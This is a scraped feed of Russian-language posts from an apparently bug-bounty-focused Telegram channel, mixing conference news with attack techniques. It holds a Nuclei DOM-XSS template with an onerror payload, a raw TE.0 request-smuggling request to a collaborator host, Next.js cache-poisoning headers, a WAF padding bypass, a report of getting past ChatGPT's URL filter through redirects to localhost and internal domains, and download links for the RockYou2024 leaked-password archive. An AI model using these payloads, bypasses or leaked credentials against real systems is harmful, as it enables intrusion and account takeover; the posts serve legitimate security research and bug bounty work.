11515
Чат: @shadow_chat_tg Предложения, вопросы, сотрудничество: @shdwpwn
💬 Обновленный поиск XSS с Nuclei
В новом обновлении Nuclei v3.3.2 добавили фичу, позволяющую обнаруживать XSS в headless моде с помощью действия waitdialog. Говоря по простому, теперь можно составить шаблон, который будет понимать, когда выскакивает alert(), что позволит искать в том числе и DOM XSS.
Я решил протестить все это на лабе портсвигера. По итогу, получился вот такой шаблон:
id: xss-detection
info:
name: Test Template for DOM XSS
author: shdwpwn
severity: medium
description: Test Template for DOM XSS
reference: https://blog.projectdiscovery.io/simplifying-xss-detection-with-nuclei/
tags: xss
headless:
- steps:
- args:
url: "{{BaseURL}}/?search=<img/src/onerror=alert()>"
action: navigate
- action: waitdialog
name: popup
matchers:
- type: dsl
dsl:
- popup == true
condition: and
nuclei -headless -t dom-xss-test.yaml -u https://blablabla.web-security-academy.net
Давненько не обновлял Burp Suite и решил глянуть на изменения в новых версиях. Помимо улучшения производительности, оказывается, теперь там можно … играть???
https://github.com/BugBountyzip/Bambdas
Знакомимся с DOOM DOM Invader, или как найти DOM-XSS на Habr во время написания статьи 😔
Сегодня поговорим про инструмент DOM Invader, узнаем некоторые причины появления DOM-уязвимостей и проанализируем несколько примеров уязвимого JavaScript-кода 🖼️
Также вы узнаете, какой потенциальный импакт можно показывать команде BugBounty для получения выплаты за Client-Side уязвимость 👀
Подробнее
😆 Как мы с вами выросли за год
На пресс-конференции в рамках OFFZONE 2024 поделились итогами работы BI.ZONE Bug Bounty вместе со Сбером, «Группой Астра» и багхантером Артёмом Бельченко.
Из интересного:
🔵Сегодня на платформе размещаются 34 компании и 78 программ по поиску уязвимостей.
🔵Выплаты увеличились почти в 3 раза: их общая сумма составила 45 миллионов рублей, а за уязвимости уровней high и critical заплатили 28 миллионов рублей.
🔵Более чем в 1,5 раза возросло количество отчетов от багхантеров. При этом каждая шестая обнаруженная уязвимость относилась к уровням high и critical.
🔵За последний год на платформе более чем в 3 раза увеличилось количество компаний из финансовой отрасли и в 6 раз выросло число программ от госсектора.
🔵Мы запустили первую в стране программу по поиску уязвимостей в инфраструктуре субъекта РФ — Ленинградской области.
Впереди нас ждет еще больше программ, выплат и крутых ивентов для сообщества!
Если еще не багхантите с нами, присоединяйтесь ;)
®️ До встречи на OFFZONE
Я живу достаточно далеко от МСК и не часто выбираюсь из своей уютной берлоги, но в этом году, как и в прошлом, поеду на OFFZONE. В том году мероприятие запомнилось мне, в первую очередь, встречей с множеством крутых специалистов, среди которых были и мои подписчики. В этом году буду также рад с вами увидеться!
Кроме того, знаю про несколько крутых докладов, которые будут в этом году на ивенте. Организаторы недавно выложили программу мероприятия, поэтому можно перейти по линку и отобрать интересные для себя выступления в избранное.
Ну и конечно же не стоит напоминать про другие активности вроде воркшопов, стендов, викторин, кальянов, пива, гор мерча и многого другого. Так что подходите, увидимся там!
Эксплуатация состояния гонки в «тапалках» в Telegram
https://kaimi.io/2024/08/exploit-race-condition-in-telegram-mini-apps/
📖 AlphaBay: Как ошибка в Opsec привела к поимке «короля» даркнета
Alphabay — огромный даркнет-маркетплейс, стал символом эпохи «темного» интернета. Его создание - результат стремления к анонимности, которое в итоге привело к катастрофическим последствиям.
Alphabay предлагал убежище для преступников, где они могли продавать наркотики, оружие и украденные данные. Но за анонимностью скрывался Александр Казес - тот самый Alpha02, администратор сайта, только он не учёл важность Opsec - что его и погубило.
⏳ Обход аутентификации с помощью Race Condition, приводящий к полному захвату учетной записи
Помните исследование Джеймса Кеттла про Race Condition? В данной статье будет пример реализации данного исследования на практике во время багхантинга и, как итог, захват любого аккаунта на сайте.
Ссылка на статью
#web #race #ato
TE.0 HTTP Request Smuggling
Новая техника эксплуатации HTTP Request Smuggling представлена в блоге Bugcrowd
Суть TE.0 такая же как у CL.0 только в данном случае фронт принимает, а бэкэнд игнорирует заголовок Transfer-Encoding. Кто бы мог подумать, что в мире найдутся сервера обрабатывающие запрос, который начинается с number + newline😎OPTIONS / HTTP/1.1
Host: {HOST}
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Transfer-Encoding: chunked
Connection: keep-alive
50
GET <http://our-collaborator-server/> HTTP/1.1
x: X
0
EMPTY_LINE_HERE
EMPTY_LINE_HERE
Такие нашлись у GCP load balancer'ов, эксплуатация TE.0 позволила обойти Google IAP (Identity-Aware Proxy) и получить доступ к ресурсам за этой проксей с байпасом механизмов аутентификации и авторизации, за репорт баги Google выплатили исследователям $8.5k
Особенности эксплуатации TE.0:
✅ Значение chunk length должно быть в hex number в соответствии с HTTP/1.1 RFC
✅ 2 EMPTY_LINE_HERE в конце последнего чанка запроса
✅ Использование различных методов при отправке пейлоада (в кейсе с GCP успешно отработал OPTIONS)
😆 Прокачали BI.ZONE Bug Bounty для успешного багхантинга
Мы завершили первый этап редизайна платформы и телеграм-канала!
Что нового:
🔵Изменили стилевое и цветовое оформление. Визуальная часть стала более атмосферной и тематической.
🔵Внедрили систему тегов. Теперь легко отфильтровать программы по нужным критериям. Например, кто отвечает за триаж — компания или наши эксперты, можно ли перевести выплату на благотворительность.
🔵Добавили метрику для программы. Появилась возможность посмотреть среднее время обработки отчета в рамках каждой программы. Учитывается период с момента отправки репорта до получения информации о его финальном статусе.
Кстати, платформа переехала и теперь располагается тут — https://bugbounty.bi.zone.
Этот релиз — первый из запланированных. Поэтому расскажите нам о своих пожеланиях и поделитесь идеями, чтобы мы смогли их учесть в следующих обновлениях.
А пока можете изучить платформу ;)
💀 Про Next.js и отравление кэша
1️⃣ При извлечении данных для страниц SSR (рендеринга на стороне сервера) добавление заголовка x-middleware-prefetch приводит к получению пустого объекта JSON {} в качестве ответа. При наличии CDN или системы кэширования этот пустой ответ потенциально может быть кэширован, в зависимости от конфигурации правил кэширования, что делает целевую страницу непрактичной, а ее содержимое недоступным и получается некая разновидность DOS'а через отравление кэша.
2️⃣ Использование React Component Server (RSC) и отправка заголовка Rsc: 1, может привести к отравлению кэша и вернет RSC React вместо исходного содержимого. Успешность также зависит от CDN и его правил кэширования.
3️⃣ При определенных условиях можно перезаписать код состояния через значение заголовка x-invoke-status, непосредственно указанного в запросе и вызвать/вернуть страницу ошибки. Как правило, CDN и системы кэширования настроены так, чтобы не кэшировать коды ошибок HTTP. Однако можно указать код 200 для согласования с правилами кэширования и эффективно “принудительно” кэшировать страницу с ошибкой.
Более подробно про каждый из способов, а также некоторые советы как нафармить денег при общении с триажерами доступны в оригинальном ресерче по ссылке.
#web #cache #dos
🔃 Редирект в ChatGPT
Очередному исследователю не заплатили и он поделился рассказом о том, что ChatGPT не может получать доступ к определенным веб-сайтам, однако фильтрация некорректно обрабатывает HTTP-перенаправления. Вы можете использовать любой сокращатель ссылок и обойти их проверки.
Более того, это также работает для ссылок типа https://localhost:<порт для сканирования>/ и внутренних доменов OpenAI.
Однако, по мнению компании, это не угроза безопасности.
#web #ssrf
Кстати, на днях согласовал с вендором публикацию рассказа об одном из отчетов, чтобы закинуть заявку на Pentest Award. В итоге статья увидела свет и была отправлена, хоть и в довольно урезанном виде. Если тоже хотите поучаствовать, чтобы выиграть призы или просто поделиться с комьюнити своими интересными находками, то у вас еще есть время до 23.06.
Читать полностью…
🔎Собираем поддомены и IP в RSECloud
Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.
Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:
Сбор поддоменов:
rsescan -d example.com -key YOUR_API_KEY
rsescan -d example.com -cn -key YOUR_API_KEY
rsescan -so "Organization Name" -key YOUR_API_KEY
👨💻Доклады с PHDays 2
На ютубе появляются доклады с прошедшего PHDays 2 и вот вам некоторые из них:
➖Учат в школе
Выступление, посвященное различным уязвимостям и методам взлома на платформах для обучения хакеров.
➖Выявление многоэтапных SQL-инъекций
Про то, как бизнес-логика может предполагать срабатывание инъекций через несколько этапов и запросов, и показывает инструменты для работы с такими инъекциями.
➖Вам письмо: старые новые атаки на почту
Про уязвимости внедрение кода в современной электронной почте.
➖Тонкости импортозамещения CMS. Собираем bug bounty и БДУ по реестру отечественного ПО
Про поиск уязвимостей в отечественных CMS и пополнение БДУ новыми уязвимостями.
➖XXE: как обработка XML приводит к проблемам с безопасностью
Основы эксплуатации XXE и защиты (или ее отсутствии) от этой уязвимости в разных фреймворках, с примерами уязвимого кода из open-source-проектов.
➖Анализ клиентского JavaScript для обнаружения HTTP-эндпоинтов: два года спустя
Про разработку статического анализатора клиентского JavaScript-кода для обнаружения серверных HTTP-эндпоинтов.
Еще больше крутых выступлений смотрите на ютуб по ссылке ниже.
Ссылка на плейлист
#learn #web #redteam
✨ Хочешь получить доступ к приватным программам на платформе Standoff Bug Bounty?
Конечно хочешь. Вот короткая инструкция, что делать:
1️⃣ Перейди по ссылке и заполни небольшой опрос.
2️⃣ Попади в список из 50 счастливчиков с самыми классными навыками и опытом. Если пройдешь отбор, мы сразу же тебе напишем.
3️⃣ Ищи баги в свеженьком закрытом скоупе.
❗️ Важное условие: у тебя не должно быть ни одной приватной программы.
Еще читаешь? Бросай это дело — анкета сама себя не заполнит.
Опубликовали видеоролик о том, как прошла ежегодная независимая премия Pentest award 2024!
Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.
Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.
До встречи в 2025 году 👋
Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.
📺 Полное видео
🔗 Pentest award (архив)
❤ @justsecurity
🖊️Семантические уязвимости в серверах Apache
В связи с недавно прошедшими мероприятиями и моим отпуском не было времени упомянуть некоторые крутые недавно опубликованные доклады. И к одному из таких относится ресерч старины Orange Tsai, в ходе которого было найдено сразу несколько CVE и различных мисконфигов в серверах Apache.
Странно, что никто об этом еще не написал, так как материал очень интересный и я всем рекомендую ознакомиться с оригиналом по ссылке. Я также набросал несколько шаблонов для Nuclei на основе этого доклада, которые вы можете доработать или использовать как есть на своих целях (закину их в комменты под постом).
#web #apache #cve
®️ OFFZONE 2024 - всё
Вот и закончился OFFZONE 2024 и хочется сказать спасибо организаторам и всем причастным за столь крутое мероприятие! @offzone_moscow вы молодцы)
За эти два дня пообщался с многими классными специалистами и просто с интересными людьми, поучаствовал в различных активностях и послушал несколько докладов. Отдельное спасибо @bizone_bb за приглашение на их ивенты, а всем вендорам за разнообразный скоуп! За афтепати отдельный респект, было весело!
В общем, рад был всех видеть и до новых встреч!
Когда включаешь сканер уязвимостей на публичной баг баунти программе
Читать полностью…
Пара кейсов с БагБаунти ☄️
Решил поделиться парой найденных багов, которые были подтверждены около года назад и уже исправлены.
В будущем планирую также выкладывать подобные посты, так как практические кейсы всегда позволяют подчерпнуть для себя чего-то нового.
Приятного прочтения ! 🔥
🎉 Результаты розыгрыша:
Победители:
1. Mikhail (@tru3f4ls3)
2. Игорь
Проверить результаты
🎉 Розыгрыш билетов на OFFZONE
Да свершится великий рандом! Я разыграю ДВА БИЛЕТА на одну из самых ожидаемых конференций года - OFFZONE.
Как принять участие:
- Быть подписанным на канал
- Нажать кнопку "Участвую!" под этим постом
Бот случайным образом выберет двух счастливчиков среди тех, кто выполнит все условия!
Сроки:
Розыгрыш продлится до 29.07.2024, а победители будут объявлены на следующий день.
Не упустите свой шанс стать частью OFFZONE! Удачи всем участникам!
#offzone
🪟XSS на веб-сайтах с отсутствующей информацией о кодировке
Злоумышленник может использовать кодировку символов ISO-2022-JP для внедрения произвольного кода JavaScript на веб-сайтах, где отсутствует информация о кодировке HTML страницы.
Подробнее о том, как это работает и почему может приводить к XSS читайте в блоге по ссылке.
#web #xss
RockYou2024
Архив весит 45 гб
Распакованный 156 гб
Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g
🌚 @poxek
На Pentest Award продлили прием заявок аж до 14 июля. Меньше всего конкуренции в номинации «Ловись рыбка: за самый оригинальный фишинг или попытку засоциалить сотрудников», поэтому, если у вас имеются интересные кейсы, есть высокий шанс оказаться среди номинантов.
Читать полностью…
®️ Запускаем call for papers!
Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.
В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)
Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.
Присылайте заявки на доклады до 12 июля.
Узнать больше и подать заявку
⌨️ Обход WAF через большое количество символов
Ранее я уже рассказывал о том, что для HTTP-запросов, содержащих тело запроса (например, POST, PUT, PATCH и т.д.), часто можно обойти WAF, просто добавив мусорные данные в начало запроса. Когда запрос дополняется этими ненужными данными, WAF обработает до X КБ запроса и проанализирует его, но все, что превышает пределы WAF, пройдет мимо.
На недавнем NahamCon вышел целый доклад на эту тему с подробным разбором и необходимыми значениями X КБ для обхода различных популярных WAF. Видео доклада, описание и расширение для вставки мусорных данных в Burp представлено по ссылкам ниже.
Ссылка на видео
Ссылка на GitHub
#web #waf #bypass
Доброй ночи.
Написал небольшую книжку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
👾Как был найден RCE в одной из публичных программ на Bugcrowd
В статье описывается пошаговый процесс поиска RCE, начиная со сбора интересных активов и сканирования портов, и заканчивая тестированием различных эксплойтов и проверкой эндпоинтов. Автор также рассказывает о своих неудачах и успехах, приводя пример того, как настойчивость, упорство и немного удачи привели к успешному обнаружению серьезной уязвимости.
Ссылка на статью
#web #rce #struts